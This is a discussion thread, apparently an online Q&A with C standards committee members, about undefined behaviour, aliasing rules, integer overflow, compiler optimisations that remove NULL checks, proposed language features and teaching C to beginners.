Any chance any of this is on the radar for the next-gen C standard? Some of these are just ergonomics, but the first two might have saved me some grief a few times.


typedef, in spite of the name, doesn't create a new type. It only creates a new name for an existing type. Changing that would break existing code.

I wouldn't mind seeing a new feature that does define a new type (one that's identical to, but incompatible with, an existing type), but we can't call it "typedef".

In a sense that feature already exists. You can define a structure with a single member of an existing type. But you have to refer to the member by name to do anything with it.


Yeah, I don't program much in C and I don't have a question. I'm here just to congratulate everyone involved for this amazing thing. It's awesome to see people take the time to help each other. Nice job!


Can memory safety be ensured in the C programming language? By static analysis at compile time for example?


It is possible to guarantee that a C program does not have any undefined behavior, which includes all the memory errors that are often also security vulnerabilities.

“Static analysis” may be the wrong name to classify the tools that work in that area, because “static analysis” is usually used for purely automatic tools, whereas the tools used to guarantee the absence of undefined behaviors are not entirely automatic except for the simplest of programs.

Results of a static analyzer are often characterized in terms of “false positives” and “false negatives”. It is a possible design choice to make an analyzer with no false negatives. It is absolutely not impossible! (Some people think it is fundamentally impossible because it sounds like a computer science theorem, but it isn't one. The theorem would apply if one intended to make an analyzer with no false positives and no false negatives—and if computers were Turing machines.)

Analyzers designed to have no false negatives are called “sound”. In practice, this kind of analyzer may prove that a simple program is free of Undefined Behavior if the program is a simple example of 100 lines, but for a more realistic software component of at least a few thousand lines, the result will be obtained after a collaborative human-analyzer process (in which the analyzer catches reasoning errors made by the human, so the result is still better than what you can get with code reviews alone).

Here is what the result of this collaborative human-analyzer process may look like for a library as cleanly designed and self-contained as Mbed TLS (formerly PolarSSL): https://trust-in-soft.com/polarSSL_demo.pdf


Does the committee have any plans to document the rationale for each kind of Undefined Behavior?

Does the committee have any plans to make NULL pointer arguments to memcpy non-UB when the size argument is 0?


> Does the committee have any plans to document the rationale for each kind of Undefined Behavior?

In the C99 timeframe, we had a rationale document that was separately maintained. My understanding (this predates my joining the committee) is that this was prohibitively labor-intensive and so we stopped doing it for C11. I don't know of any plans to start doing this again, even in a limited sense for justifying UB. That said, we do spend time considering whether an aspect of a proposal requires UB or not, so the rationale exists in the proposals and committee minutes.

> Does the committee have any plans to make NULL pointer arguments to memcpy non-UB when the size argument is 0?

I have not seen such a proposal, and suspect that implementations may be concerned about losing their optimization opportunities from such a change. (Personally, I'd be okay losing those optimization opportunities as this does not seem like a situation where UB is necessary.)


Why isn't there a binary prefix in the standard? Like 0b0111010?


In my opinion C is good as it is. C++ is a terribly complicated mess, always has been, and adding more and more "modern" functionality isn't helping it much. There are great standard functions, e.g. for strings, in C, whereas it is often very inconvenient or complicated to do simple things like uppercasing a string in C++. I always ended up basically using C with just basic OOP functionality from C++. But I am not writing C/C++ daily, so my opinion is not very important...


The syntax used in the following function definition is said to be obsolescent in C11:

  int f(a, n)
  int n;
  int a[n][n];
  { return a[n-1][n-1]; }

How could one define this function without using the obsolete syntax?


You couldn't in that parameter order. However, you could do this:

  int f(size_t n, int a[n][n]) { return a[n-1][n-1]; }

(https://godbolt.org/z/DV9c-C)

Btw, that definition was obsolescent in C89 too.


Well, yes. But putting the array argument(s) first is the more natural order, in my opinion. And it is surely odd that only one order is allowed in this context, when otherwise C is happy with changing the order of parameters to be whatever you like.

Plus, of course, there may be existing code using such functions, with parameters in the order that would become impossible if this syntax were disallowed.


What do you think of a variant on this?

https://blog.regehr.org/archives/1180


I still want to write at least one sequel to that post, on the theme “Alright, can we make a Friendly C Compiler by disabling the annoying optimizations, then?”.

Obviously the people who want a Friendly C Compiler do not want to disable all optimizations. This would be easy to do, but these users do not want the stupid 1+2+16 expressions in their C programs, generated through macro-expansion, to be compiled to two additions with each intermediate result making a round-trip through memory.

So the question is: can we get a Friendly C Compiler by enabling only the Friendly optimizations in an unfriendly compiler?

And for the answer to that, I had to write an entire other blog post as preparation, to show that there are some assumptions an optimizing compiler can make:

- that may be used in one or several optimizations, but the compiler authors did not really keep track of where they were used,

- that cannot be disabled and that the compiler maintainers will not consider having an option to disable,

- and that are definitely unfriendly.

Here is the URL of the blog post that I had to write in preparation for the upcoming blog post about getting ourselves a Friendly C Compiler: https://trust-in-soft.com/blog/2020/04/06/gcc-always-assumes... . I recommend you take a look, I think it is interesting in itself.

You will have guessed that I'm not optimistic about the approach. We can try to maintain a list of friendly optimizations for ourselves, though, even if the compiler developers are not helping. This might still be less work than maintaining a C compiler.


> Here is the URL of the blog post that I had to write in preparation for the upcoming blog post about getting ourselves a Friendly C Compiler: https://trust-in-soft.com/blog/2020/04/06/gcc-always-assumes.... . I recommend you take a look, I think it is interesting in itself.

So, it's definitely interesting -- I think a lot of odd stuff you can do should probably be undefined. Eliminating pointer accesses after a null check sounds A-ok to me, because your program should never dereference null.

Another interesting thought is requiring more of these things that lead to miscompilation to produce compile time diagnostics.


pascal_cuoq cowrote it. Maybe we should ask him if his views have changed since then.

Btw, there was a thread about it at the time: https://news.ycombinator.com/item?id=8233484.


Thanks Dan, I missed this question in the heat of the moment.


Can you do anything to push Microsoft to implement recent C standards? Their failure to fully implement even C99 in Visual Studio is holding the language back.


Not really -- vendors are free to ignore newer releases of the standard that do not meet their customers' needs, and the committee can't do much about it.

However, as a user, you can help apply pressure on the vendor to support newer standards. For instance, with Microsoft, you could support this feedback request: https://developercommunity.visualstudio.com/idea/387315/add-...


There is little that the C Standards group can do about it. One idea is to write a C Standards conformance into contracts. When I was in the government we often did that, but it still wasn't enough clout.


My understanding is that Microsoft doesn't want to support C, and the only reason Visual Studio supports C at all is for legacy code. Also, you can use 3rd-party compilers with Visual Studio.

Really, anyone writing C nowadays should ignore Microsoft's compiler, and tell Visual Studio users to install Clang.


Would you consider adding a built-in way to safely multiply two numbers?

Numeric overflows in things like calculation of buffer sizes can lead to vulnerabilities.

Signed overflow is UB, and due to integer promotion signs creep in unexpected places.

It's not trivial to check if overflow happened due to UB rules. A naive check can make things even worse by "proving" the opposite to the optimizer.

And all of that is to read one bit that CPUs have readily available.


There are a lot of arithmetic conditions for which C could generate special code. There are div_t-related functions for the other direction. I for one would like a good way to obtain, using some Standard C coding pattern, fast "carry" for multiple-precision integer arithmetic.

Several places in support functions, I have coded unusually to avoid wrap-around etc. I bet you could devise something like that for (unsigned) multiplication.


A horrifying case was multiplication in an x86 emulator. The opcode handler needed to multiply a pair of unsigned 16-bit values, then return a 64-bit result.

The uint16_t got promoted to an int for the multiplication, causing undefined behavior. (if I remember right, the result was assigned to a uint16_t as well, making the intent clear) The compiler then assumed that the 32-bit intermediate couldn't possibly have the sign bit set, so it wouldn't matter if promotion to a 64-bit value had sign extension or zero extension. Depending on the optimization level, the compiler would do one or the other.

This is truly awful behavior. It should not be permitted.


I can't really blame gcc for that one, since the most straightforward way of using signed integer arithmetic would yield a negative value if the result is bigger than INT_MAX, but it would be very weird for programs to expect and rely upon that behavior.

On the other hand, even the function "unsigned mul_mod_65536(unsigned short x, unsigned short y) { return (x * y) & 0xFFFF; }" which the authors of the Standard would have expected commonplace implementations to process in consistent fashion for all possible values of "x" and "y" [the Rationale describes their expectations] will sometimes cause gcc to jump the rails if the arithmetical value of the product exceeds INT_MAX, despite the fact that the sign bit of the computation is ignored. If, for example, the product would exceed INT_MAX on the second iteration of a loop that should run a variable number of iterations, gcc will replace the loop with code that just handles the first iteration.



See post above. There is no good way for compilers to handle that case, but gcc gets "creative" even in cases where the authors of C89 made their intentions clear.


Is there any reason to keep the undefined behavior for shifts of negative numbers, instead of making it implementation defined? Most compilers (for twos-complement architectures at least) are not using that latitude, and I would also guess that most programs that are written for twos-complement arithmetic likewise not expecting undefined behavior for non-overflowing left shifts of negative numbers. Thanks!


"Implementation-defined" is a nuisance, because then you need to add code for all the variations, which also requires a set of standard macros, etc. It is easier and less trouble-prone to just avoid using the currently undefined behavior.


Will Effective C cover the strict aliasing rule and also why the BSD sockets API seems to get away with it (e.g. (sockaddr *) &sockaddr_in)?


I don't think the book covers strict aliasing, at least not in detail.


I thought we had fixed the BSD socket aliasing a long time ago?


Isn't that legal if they are all in a union?


(1) Explain just how malloc() and free() work under the covers and the implications for multi-threading, memory leaks, virtual memory paging, etc.

Maybe also cover some means, algorithms, and code for reporting on the state, status, etc. of the memory use by malloc() and free().

By the way, I know and have known well for longer than most C programmers have lived JUST what the heap data structure, as used in "heap sort", is. But what is the meaning of "the heap" in C programming language documentation?

(2) Cover in overwhelmingly fine detail the "stack" and the chuckhole in the road, stack overflow.

(3) Where to get a reliable package for a reasonable package of code for handling character strings -- what I saw and worked with in C is not reasonable.

(4) From the C programming I did, it looks like a large C program for significant work involves some hundreds, maybe tens of thousands, of includes, inserts, whatever, and what a linkage editor would call external references. There must somewhere be some tools to help a programmer make sense of all those includes and references, the resulting memory maps, issues of locality of reference, word boundary alignment, etc.

(5) How can C exploit a processor with 64 bit addressing and main memory in the tens of gigabytes and maybe terabytes?

(6) How can C support, i.e., exploit, integers and IEEE floating point in 64 and/or 128 bit lengths?

(7) How to handle exceptional conditions with, say, non-local gotos and without danger of memory leaks?

(8) Sorry, but far and away my favorite programming language long has been and remains PL/I, especially for its scope of names rules, handling of aggregates with external scope, its data structures, and its exceptional conditional handling with non-local gotos and freeing automatic storage and, thus, avoiding memory leaks. Of course I can't use PL/I now, but the problems PL/I solved are still with us, also when writing C code. So, how to solve these problems with C code?

(9) For C++, please explain how that works under the covers. E.g., some years ago it appeared that C++ was defined as only a source code pre-processor to C. Is this still the case? If so, then explaining C++ under the covers should be feasible and valuable.


(1) There are several implementations; most are based on Knuth's "boundary tag" algorithms. As to "heap": a stack has one accessible end, while a heap is essentially randomly accessible. Nothing to do with the heap data structure.

(2) Stack overflow can occur even early within a program. I've campaigned for a requirement that such overflows be caught and integrated into a standard exception handler, to no avail.

(3) Why not code your own, so there won't be arguments about it.

(4) There are lots of tools for program development, but that area is not standardized by WG14.

(5) Use wider integer types.

(6) Use wider floating-point representations.

(7) Standard C doesn't specify such a facility, but it has occasionally been suggested.

(8) There were a lot of books, e.g. on structured system analysis, during the 1970s trying to apply lessons learned. C isn't special in that regard, as many of the big problems don't involve syntax.

(9) C++ is now a big language and it takes a lot of work to master its internals.


> But what is the meaning of "the heap" in C programming language documentation?

The C language standard does not contain the word "heap" anywhere; as far as C is concerned, there is no "heap" in particular.


It has been many years since a C++-to-C preprocessor has been commonplace. There's just too much new stuff in recent C++ to map it all easily into straight C.


(7) Exactly. Please add how to free memory in a standard way if there's an exception, and how not to use goto in such cases.


> Explain just how malloc() and free() work under the covers and the implications for multi-threading, memory leaks, virtual memory paging, etc.

> Maybe also cover some means, algorithms, and code for reporting on the state, status, etc. of the memory use by malloc() and free().

Strictly speaking, these are implementation details that the C standard leaves unspecified. If you want to know how the memory allocation functions work or methods for inspecting the state of the heap you'll need to look at a specific implementation (e.g., glibc, musl, jemalloc, etc.) since the details can vary wildly between implementations.

> Cover in overwhelmingly fine detail the "stack" and the chuckhole in the road, stack overflow.

Both these are not really specific to C, and there should be a lot of resources you can find that explain these concepts ([0], [1] for some example general explanations). Did you have more specific questions in mind?

> How can C exploit a processor with 64 bit addressing and main memory in the tens of gigabytes and maybe terabytes?

> How can C support, i.e., exploit, integers and IEEE floating point in 64 and/or 128 bit lengths?

I think pointer/integer sizes are implementation details. C specifies pointer behavior and minimum integer sizes (and optional fixed-width types), but the precise widths are chosen by the implementation. For floating-point, implementations that support IEEE 754 (Annex F of the standard) use its widths.

In other words, you don't really need to do anything special as long as you pick the appropriate types as defined by your implementation.

> For C++, please explain how that works under the covers. E.g., some years ago it appeared the C++ was defined as only a source code pre-processor to C. Is this still the case?

As far as I know no (production-quality?) C++ compiler has been implemented as a source-level preprocessor for basically the entirety of C++'s existence [2]. The very first "compiler" for C++ was Cpre, back when C++ was still the C dialect "C with classes" (around October 1979), and that was indeed a preprocessor. That was replaced by the Cfront front end around 1982-1983, about when "C with classes" started gaining new features and got a new name. Cfront was a proper compiler front end that emitted C code, and I think from that point on C++ compilers used "standard" compiler tech.

[0]: https://stackoverflow.com/questions/79923/what-and-where-are...

[1]: https://en.wikipedia.org/wiki/Stack_overflow

[2]: http://www.stroustrup.com/hopl2.pdf


Thanks.

> Did you have more specific questions in mind?

On stack overflow, my understanding was that one could encounter that fatal condition from a call stack that suddenly becomes too deep, that is, too many calls without a return. So, if the "stack" is a, say, finite resource, then the programmer should know in the code how much of that resource is being used and act accordingly.

For a preprocessor for C++, IIRC at one point the definition of C++ was in terms of a preprocessor -- I was just thinking of the definition, that is, getting a more explicit definition of C++. I've always understood that C++ implementations were always, or nearly always, done via usual compilation. The issue is that at least at one time it seemed difficult to be precise about C++ semantics, that is, what the code would do and how it would do it. Maybe now C++ is beautifully documented.


> So, if the "stack" is a, say, finite resource, then the programmer should know in the code how much of that resource is being used and act accordingly.

And this is true, but IIRC statically determining stack bounds for arbitrary programs is not an easy problem to solve, especially if you call into opaque third-party libraries.

> For a preprocessor for C++, I IIRC at one point the definition of C++ was in terms of a preprocessor

I wouldn't know about defining C++ in terms of transformations to C, and searching for that is more difficult. I would guess that the abandonment of the preprocessor approach to compilation would also have meant the abandonment of defining C++ in terms of C, especially once C++ really started picking up features.

> The issue is that at least at one time it seemed difficult to be precise about C++ semantics, that is, what the code would do and how it would do it. Maybe now C++ is beautifully documented.

C++ has had a formal specification since 1998, which might count as documentation for you.


If the Standard were to make recursion an optional feature, many programs' stack usage could be statically verified. Indeed, there are some not-quite-conforming compilers which can statically verify stack usage--a feature which for many purposes would be far more useful than support for recursion.


What would you say to people who claim that writing "secure C code" is impossible [not me but I'm curious what you all think]?


I'd ask them if they really meant "impossible" or just "harder than I wish it was".

I've typically found that the tradeoffs between security, performance, and implementation efforts are usually more to blame for why writing secure C code is a challenge. There are a ton of tools out there to help with writing secure code (compiler diagnostics, secure coding standards, static analyzers, fuzzers, sanitizers, etc), but you need to use all the tools at your disposal (instead of only a single source of security) which adds implementation cost and sometimes runtime overhead that needs to be balanced against shipping a product.

This isn't to suggest that the language itself doesn't have sharp edges that would be nice to smooth over, though!


I'm teaching C to high schoolers as their first language, which is quite the adventure. Do you have any good advice or resources on how to introduce the way C treats the function stack and heap allocated memory? Most of my students struggle (naturally) with making sense of function scoped identifiers and pass-by-value semantics.


This service has been designed to try out small self-contained C examples online (in a manner reminiscent of Compiler Explorer):

https://taas.trust-in-soft.com/tsnippet/

One advantage is that it identifies a LOT of undefined behaviors during execution for which traditional compilation and execution only give puzzling results.

One drawback is that some of the undefined behaviors it identifies are obscure, and for others the message may be unusual. For instance, using a standard function without including the appropriate header may result in a warning about the mismatch between the type in the header and the type of the arguments the standard function was applied to after arguments promotions.

Overall, you may still find it useful for teaching.


Thanks! Definitely an interesting tool. Two of my students are fascinated by the idea of undefined behavior right now (having run into it in practice; the idea that off-by-one errors sometimes crash their program and sometimes behave "normally" is really odd to them), so I'll point them at this to play with.


Curious what were the requirements to select C as a first high school language over many other choices? I imagine there's a balance of practicality (after the class), and then the usual questions about tooling, sharp edges, and ease of learning.


It's a three year rotation: Python, C (Unix), C (Arduino). My goal with the class is to teach ideas that will stand the test of time. C (and Unix) certainly fit that bill.

Happily, the tooling is the easiest part. Every student has a Raspberry Pi running Debian, no mouse, no window server, and no extraneous software. You can spool kids up on a nano-based C toolchain in one class period with remarkably few sharp edges. There's even some fun accidental learning the first time they nano their executable file.


Neat! I think your choice of C and Python as the languages to be taught is very right. The idea of showing the use of C in both Desktop/Server and Embedded environments has long been the approach I have advocated. C is truly the de-facto "universal" language and students should be made aware of it from the start.

I would suggest the following additions;

* The Arduino "language" is C++. Use this as a gentle introduction to C++ as a "better C". From there you can move on to proper C++ (do NOT teach "Modern C++" in the beginning). The intent is to show how "C + some syntactic sugar for expressing abstractions" is quite powerful and that is what is C++. This should prepare the students to embark on a proper study of C++.

* Instead of using the Arduino "language+library" through the IDE, show them how to use the same GNU gcc toolchain to program the MCU directly in C. See Make: AVR programming by Elliot Williams for details. This teaches the students the idea of a "cross compiler toolchain" and all other related matters from first principles.


C++ is the language with which I’m most comfortable, having used it professionally for the better part of a decade. I’ve gone back and forth on using it in HS. Its abstractions are so opaque if you don’t already have a well-developed model of programming.

For the arduino, I’m really interested in teaching control systems. So we will start with finite state machines and go from there to implementing PID controllers. I’m intrigued by the idea of avoiding the IDE, so will totally pick up that book!


Everybody seems to draw pictures of the raw memory (word-oriented) data.


I've been doing the same! It certainly helps for strings. Pointer block diagrams (like K&R use) seem to help too. Mostly what melts their brains is the idea that an identifier can be "in two places at once" - for example, you can have a variable x declared in some scope and a function one of whose arguments is named x, and those are two different things.


Try explaining the concept of "scope", starting with nested blocks. It does require some practice. I suggest not unnecessarily reusing identifiers associated with different objects.


Thanks!


I suggest The C Companion by Allen Holub for getting an idea of "behind the scenes".

For a more modern look, I suggest Computer Systems: A Programmer's Perspective by Bryant and O'Hallaron.

Of course, you would need to pick and adapt the content for your students.


Have you given the Ada language a thought? Also there are a lot of competitions your students can take part in: https://www.makewithada.org/


I haven’t - is there a good toolchain you’d recommend checking out? What’s the enduring idea in Ada?


Sorry, I didn't see the notification of your reply. Here is the toolchain from AdaCore; they also have an IDE if you want:

https://www.adacore.com/community


And some links to tutorials: https://learn.adacore.com/


char effectively behaves as a signed type, making it unsuitable for binary operations (e.g. UTF-8 manipulation). I/O functions deal with char pointers, so using unsigned type like uint8_t requires casting back and forth. Is there any way out of this problem, and am I already breaking the aliasing rules with that cast?


Plain char is either signed (same representation as signed char) or unsigned (same representation as unsigned char), depending on the implementation.

Yes, there are real-world implementations where plain char is unsigned.


Casting between the three character types is safe and doesn't violate aliasing rules. In addition, objects of all types can be accessed by lvalues of any of the three character types (though unsigned char is recommended), so there's no problem there either.

I/O functions that take a plain char* are designed to interoperate with char arrays and strings, so passing in unsigned or signed char is a sign that they aren't being used as intended. (Functions that traffic in binary data like fread/fwrite should take void*).


There are no aliasing differences between uint8_t and char as far as I know.


In practice not. In theory, it’s implementation-defined whether there are differences.


At least from what I've heard that's because stdint values are optional.

6.2.5p17: The three types char, signed char, and unsigned char are collectively called the character types. The implementation shall define char to have the same range, representation, and behavior as either signed char or unsigned char.

and

5.2.4.2.1 says that the widths of char, signed char, and unsigned char are the same (CHAR_BIT, which must be at least 8).


I don't think it's anything to do with uint8_t being optional. It's because a char might have more than 8 bits.


A conforming implementation could extend the language with an 8-bit type __nonaliasingbyte which has no special aliasing privileges, and define uint8_t as being synonymous with that type.

On the other hand, the Standard should never have given character types special aliasing rules to begin with. Such rules would have been unnecessary if the Standard had noted that an access to an lvalue which is freshly visibly derived from another is an access to the lvalue from which it is derived. The question of whether a compiler recognizes a particular lvalue as "freshly visibly derived" from another is a Quality of Implementation issue outside the Standard's jurisdiction.


Hi Team "C",

I am a beginner level programmer and C is not one of the languages for which I have even bothered to write a "hello world". That is my level.

As the people that "run" C, why do we need C? Forget the legacy systems. With fancy languages like Go, Rust, Elixir, Python, and millions of others. Of course, also the "offspring" like C++ and C#.

What was the use case that C was designed for (I have read from sources like Wikipedia, would love to hear straight from source)? In 2020, how relevant is C? If someone is going to write a system/application today, why consider C? Do you think, C will be relevant in 5 yrs (I know 1 yr in computing is like 10 yrs for humans)? With all your combined experience in computing over the years and as the members of a team that is guiding a valuable thing like "C". What is your advice/wisdom/thought for us?


How closely does the C Standard Committee work with Linux kernel developers? Does Linux kernel development influence the C standard?


There's not an official collaboration between the committee and the kernel developers (that I'm aware of), but we do have people on the committee who need to support Linux kernel development (such as GCC maintainers), so there is some level of indirect influence there.


One feature of C which I do not use often is enums. Support for constants beyond the range of an int is not portable. I also try to avoid putting enums inside structs, because there is no portable way to enforce the size or the alignment of the enum's base type.

Will this be addressed in future revisions of the C standard?


Is there any new programming language that you particularly love? Do you like the way programming is evolving?


As a member of the development team for a C static analyzer, I use OCaml, which is also my favorite programming language, but that is because I'm from the generation in which it was the new thing (I learnt it when it had the same level of maturity as Rust has today, at a time when Rust didn't exist). It helps that it's perfect for writing compilers and static analyzers.

There are a lot of problems that seem a good match for Rust, and Rust is first in my list of programming languages I will never find the time to learn but wish I could.


Why won't you ever find time? It should only take a good 20 hours of reading and playing with code before you start to grok it.


I spent the early part of my career bragging about how many programming languages I knew, and the later part of my career complaining about how I don't know any of them well enough.


I certainly wouldn't go for quantity there, but if you really want to learn Rust you should. It brings some groundbreaking new ideas to programming and is more than "just another language".


Curious what the committee members think of the new competitors to C, e.g. Go, Rust, and Zig. Any comments?


Go isn't a competitor to C.


F-Secure apparently thinks otherwise,

https://www.f-secure.com/en/consulting/foundry/usb-armory

As does Google,

https://github.com/google/gvisor

https://github.com/google/gapid

Naturally if one is talking about specific use cases like IoT with a couple of KBs, MISRA-C, or UNIX kernels, then yes Go is not a competitor.


Rather than trying to come up with "compromise aliasing rules", the Standard needs to recognize that different tasks require different features, and allowing all possible optimization opportunities that would be useful for some tasks would make an implementation totally unsuitable for others.

I would suggest that the Standard define directives to demand three modes, with the proviso that a compiler may reject code which demands a mode it cannot accommodate:

1. clang/gcc mode, which would be adjusted to match the way clang and gcc actually behave, as well as anything they want to do but their interpretation of the Standard wouldn't allow.

2. precise mode, which behaves as though all loads and stores of objects whose address is taken behave according to a precise memory-based abstraction

3. sequence-based mode, which would allow compilers to hoist, defer, consolidate, and eliminate loads and stores in cases where they honor data dependencies that are visible in the code sequence, but would require that compilers recognize visible dependencies which clang and gcc presently ignore, and would also require that the definition of "based on" used by "restrict" recognize that any pointer formed by adding or subtracting an integer from another pointer by recognized as "at least potentially based on" the former, even in corner cases where clang and gcc would ignore that.

Recognizing mode #1 would allow clang and gcc to keep using their aliasing logic with programs that can tolerate it. Mode #2 would ensure that all programs that have trouble with that logic could have defined behavior by adding a directive demanding it. Mode #3 would allow most of the same useful optimizations as mode #1, but work with a wide range of programs that would presently require `-fno-strict-aliasing`.

If one recognizes the need for different modes, the effort required to describe all three modes would be tractable, compared to the obviously-intractable problem of reaching consensus about how one mode that would need to serve all purposes.


- Which differences between the C abstract machine and actual modern CPUs/hardware have proven most difficult to deal with in the language?

- Are you planning any addition regarding modeling of how modern CPUs work (e.g. pipelines, branches, speculative execution, cache lines, etc)?

PS: Thank you for doing this!


> - Which differences between the C abstract machine and actual modern CPUs/hardware have proven most difficult to deal with in the language?

For me, I think it's 'volatile' because, by its nature, you can't describe what it means in the abstract machine very well. For instance, consider a proposal to add something like a "secure clear" function for clearing out sensitive data. The natural inclination is to pretend that data is volatile so the optimizer won't dead-code strip your secure clear function call, but that leaves questions about things like cache lines, distributed memory, etc.

> - Are you planning any addition regarding modeling of how modern CPUs work (e.g. pipelines, branches, speculative execution, cache lines, etc)?

Maybe? ;-) We tend to talk about features at a higher level of abstraction than the hardware because hardware changes at such a rapid pace compared to the standards process. So we largely leave hardware-specific considerations as a matter of QoI for implementers.

However, that doesn't mean we wouldn't consider proposals for more concrete things like a defensive attribute to help mitigate speculative execution attacks.


Is there a rule that any new proposals must already be a feature in an existing major implementation?


Yes, the C2x charter has this requirement: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2086.htm


Thanks, so from "Only those features that have a history and are in common use by a commercial implementation should be considered", this precludes stuff that may only exist in clang, gcc, glibc, etc.? If so, why?


I wouldn't read into "commercial" there, I think we meant "production-quality" instead. (We should fix that!)

Basically, we prefer seeing features that real users have used as opposed to an experimental branch of a compiler that doesn't have usage experience. Knowing it can be implemented is one thing, but knowing users want to use it is more compelling.


You could interpret that as "in common use by a commercial[ly used] implementation".


(Not one of the OPs:) Wasn't C11 Annex K, the notoriously failed bounds-checking interfaces, an example of not having an existing implementation?


Annex K had an existing implementation from Microsoft. It wasn't a fully conforming implementation when C11 shipped, however (the specification drifted apart from the initial implementation).


Hello,

First off thank you so much for taking the time to answer questions.

As a new programmer starting with C, I am trying to learn how to go from a beginner to an intermediate. Any recommendations of projects to help learn C?

It is difficult for me to find projects that I see are "valuable", for lack of a better term.

Thank you!


One possibility is to modify some existing program to include an additional new feature. You should soon develop a sense for what works well versus what causes problems.


Is there a chance to ever see C++-template-like features appear in C?

For instance, a lot of redundant code (or ugly macro business) could be neatly replaced by function templates. Even just template functions with only POD values allowed would be a great readability improvement.


It's already there. It's called C++ templates


A few proposals:

Why not mandate a warning every time the compiler detects and makes use of UB? It would solve SO many issues. If you are looking to improve security of C programs, then letting the user know what the compiler does should be number one.

Converting as many UBs as possible to platform-specific behavior would also be a big help.

I would love to see native vector types. It's time. Vector types are now more common in hardware than float was when it was included in the C spec. Time to make it a native type. Hoping the compiler does the vectorization for you is not good enough.

Allow for more than one break.

    for(i = 0; i < n; i++)
        for(j = 0; j < n; j++)
            if(array[i][j] == x)
                break break;

is equal to:

    for(i = 0; i < n; i++)
        for(j = 0; j < n; j++)
            if(array[i][j] == x)
                goto found;
    found: ;


> Why not mandate a warning every time the compiler detects and makes use of UB? It would solve SO many issues.

Because that's hardly ever what happens. Compilers rarely detect UB outright, and when they actually do, they do an increasingly good job of issuing diagnostics. If you actually mandated it, no compiler today would come close to being standards compliant. This comes close to making the language unimplementable.

The most common issue with UB and optimizations is not that "compiler detects UB and does something with it," it's that compiler analyzes and optimizes code with the assumption that UB doesn't actually happen. It doesn't know whether it does (and in general, it is impossible to tell whether it would happen -- it's something that might or might not happen at run time, and proving it one way or another amounts to solving the halting problem), it just assumes it doesn't.

And if one mandated compilers to report every time they make an optimization that is valid under the assumption that the program is well behaved, then you would never finish reading compiler output. Or you would turn off optimizations.


They need to do better than silently removing NULL checks. You can read all about Linus's rants on this. Every time the compiler breaks things, they blame the C standard for letting them do whatever. That's what's wrong with C today. The C standard hasn't put its foot down.


I want my compiler to remove redundant checks (without any noise), and that is why I pass it an optimization flag. If you don't want such optimizations, then maybe you should not ask the compiler to make them.


This attitude is terrible! It's an attitude that says that unless you know every pitfall in the language by heart, you have no place writing code. I guess you don't use a debugger either, because you never write bugs, right? And you think that every piece of software that helps the user is for noobs, right?

There is an endless list of bugs that have been produced by very competent C programmers, because the compiler has silently removed things for some very shaky reasons.


Huh? I just want performant code. That's why I write C, and that's why I use an optimizing compiler, and that's why I ask my compiler to optimize.

I also want to write code that is reasonably generic. Thus, it will have checks and branches that cover important corner cases; they are required for completeness and correctness. But very often, all of these checks turn out to be redundant in a specific context, and an optimizing compiler can figure it out, and eliminate these checks for me.

So I don't manually need to go and write two or three versions of each function like do_foo and assume_x_is_not_null_and_do_foo and assume_y_is_less_than_int_max_minus_sizeof_z_and_do_foo and make damn sure not to call the wrong one.

I just write one version, with the right checks in place, and if after macro expansion, inlining, range analysis, common subexpression elimination, and other inference from context, with C's semantics at hand, the compiler can figure out that some of these checks are redundant, then it will optimize them out.

I ask for it, and I'm glad compiler developers deliver it. You don't need to ask for it. Just turn off these optimizations (or, rather, don't enable them) if you prefer slow and redundant code.


Why can't the following be a warning?

    int foo(bar *x)
    {
      x->blah = 0;
      if (x == NULL) ... 
      ...
    }
And produce something like "NULL check removed---pointer used before check"?


In theory? No reason.

In practice it's a special case of a more widely applicable optimization where you actually do want to remove redundant checks. So someone has to go out of their way to figure out a rule that makes the compiler warn but only in cases where a human reader finds the optimization surprising and undesirable. It's a fuzzy thing and can easily lead to lots of false positives and noise (and more whining because it didn't warn in a situation that someone considered surprising).

I think that kind of logic can easily become a support & maintenance nightmare, so I'm not surprised that compiler developers take their time and are conservative when it comes to adding such things. I would probably just ask you to either stop dereferencing NULL pointers, or turn off the optimization if you want to dereference NULL pointers and eat your cake too.


This is a very naive view of how C works in reality. Take this example:

    if(a == NULL)
        log_error_and_exit();
    *a = 0;

Compilers have been known to silently remove the NULL check in code like this. Does that seem clear to you? Is this your definition of compilers delivering for you? NULL checks don't just get removed in cases where you NULL-check the same value multiple times; they get removed for some very non-obvious reasons.

This is why the Linux kernel now needs to be built with the compiler option -fdelete-null-pointer-checks

Compilers need to start communicating what they are doing, and I think the C spec should encourage that.


You probably mean -fno-delete-null-pointer-checks?


Most compilers will no longer do this, FWIW.


A multiple-level break is a good idea, but I think that Java's labeled break is a better way to do it:

    find_in_array_loop:
    for(i = 0; i < n; i++)
        for(j = 0; j < n; j++)
            if(array[i][j] == x)
                break find_in_array_loop;


Will you ever add / have you considered adding sane formatting options for fixed-length variables in printf? Say %u32 or %s64?

Have you considered adding access to structure members by index or by string name? Have you considered dynamic structures?


> Will you ever add / have you considered adding sane formatting options for fixed length variables in printf? Say %u32 or %s64 ?

I'm not certain about the historical answer to this, but I do know that we're currently considering a proposal to introduce an exact bit-width integer type '_ExtInt(N)' to the language, and how to handle format specifiers for it is part of those discussions, so we are considering some changes in this area.

> Have you considered adding access to structure members by index or by string name? Have you considered dynamic structures?

I don't recall seeing any such proposals. I'm not familiar with the term "dynamic structures", what do you have in mind there?


>and how to handle format specifiers for it is part of those discussions, so we are considering some changes in this area.

Please, please, please pick short and descriptive format specifiers, like %[suf]\d+, ie

  s64 v=somenumber;
  printf("%s64\n", v);
_ExtInt(N) and PRIx64 etc look absolutely horrid. u?int\d+_t are also really bad, it would be great to have just [suf]\d+ as types, where \d+ is 8, 16, 32, 64 for [us] and 32 and 64 for f.

>what do you have in mind there?

Say like VLAs but structures with members that are dynamically defined and used.


> Please, please, please pick short and descriptive format specifiers, like %[su]\d+, ie

That's my personal preference as well. Using the PRI macros always makes me feel sad.

> Say like VLAs but structures with members that are dynamically defined and used.

Ah, no, I don't recall any proposals along those lines. It's an interesting idea, and I'd be curious what the runtime performance characteristics would be vs what kind of new coding patterns would emerge that you couldn't do previously though!


First, I agree on the PRI macros. I refuse to use them.

Stucture member access by name is useful. It's slow, but it doesn't affect code that isn't using the feature. The worst runtime issue is that the runtime support requirement grows. For example, libgcc would gain a few functions.

